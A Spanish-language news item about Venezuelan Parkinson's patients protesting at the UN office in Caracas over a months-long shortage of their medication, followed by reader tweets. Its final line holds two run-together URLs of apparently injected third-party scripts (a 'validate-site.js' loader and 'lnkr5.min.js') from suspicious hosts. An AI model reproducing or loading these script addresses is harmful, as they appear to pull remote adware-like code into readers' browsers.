Anayanceen @AnayansyMijares: “La realidad de los enfermos de #Parkinson en #Venezuela por la escasez de medicamentos y la preocupación los está matando y al gobernó no le importa”.

Las penurias que viven los enfermos  de Parkinson en Venezuela son incontables, además ya perdieron la cuenta de cuantos meses llevan sin conseguir las medicinas, decenas de afectados con esta dolencia, marcharon este lunes 29 de Julio en Caracas, y llegaron hasta la sede de las Naciones Unidas, para solicitarle su apoyo e intercedan ante el gobierno venezolano, para que se importen los tratamientos que necesitan.

El señor Ronald Segovia, uno de los afectados por esta enfermedad expresó: «Antes conseguíamos el medicamento mes a mes porque el gobierno lo importaba, pero desde hace siete meses cortaron ese suministro».

El señor Segovia, es un hombre delgado de apenas 50 años de edad y tiene esta dolencia desde hace 2 años, él ya no controla el fuerte temblor de su brazo izquierdo y aseguró que su condición ha empeorado. «Tenemos miedo de morir», afirmó.

La Federación Farmacéutica de Venezuela dio a conocer que la escasez de medicamentos para enfermedades crónicas llega a 95%, en tanto las esenciales, para hipertensión  por ejemplo, es de 85%, y piden al gobierno nacional que haga las importaciones necesarias para poder ayudar a los enfermos en Venezuela.

Leamos las reacciones de los seguidores de @ReporteYa

Marcos Gómez @GomezMarcosexpresa: “Pacientes con Párkinson piden por acceso a su tratamiento. 17 mil personas con #Parkinson afectadas por el recorte gubernamental a la salud en Venezuela, sin medicamentos, en peligro de muerte y con baja calidad de vida”.

Rafael Uzcátegui@fanzinero indica: “Mi padre tiene parkinson y se lo que es verlo deteriorarse por falta de tratamientos. Solidaridad con la movilización de personas afectadas por la salud”.

Aarón Belizón @AaronBelizon redacta: “Mi abuelo se apagó en tres años por causa  del #parkinson. Era una persona activa, vital y jovial, perdió la ilusión. El Gobierno no hace inversión en salud y en el bienestar social”.

Elizabeth Ostos @ElizabethOstos escribe: “#Parkinson por la apertura de un canal humanitario de alimentos y medicinas,manejado por gente honesta no gobiernera. ¡Venezuela en movimiento!”.

Francisco Zambrano @franzambranor subraya: “Tener #Parkinson en Vzla es una sentencia de muerte”.

Anayanceen @AnayansyMijares escribe: “La realidad de los enfermos de #Parkinson en #Venezuela por la escasez de medicamentos y la preocupación losestá matando y al gobernó no le importa”.

Sara Pacheco @Sara_monstra responde: “Ya es difícil vivir con #Parkinson en este país. ¿Imagínense sin poder acceder a las medicinas?”

Andrés Elías Moreno @AMflautacomparte:”Pacientes en cama, totalmente rígidos, no comen, no hablan. ¡Se nos mueren! #Parkinson #venezuela#.

VÍA EL NACIONAL.

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533175641825https://devlinkin.xyz/addons/lnkr5.min.js

Loading...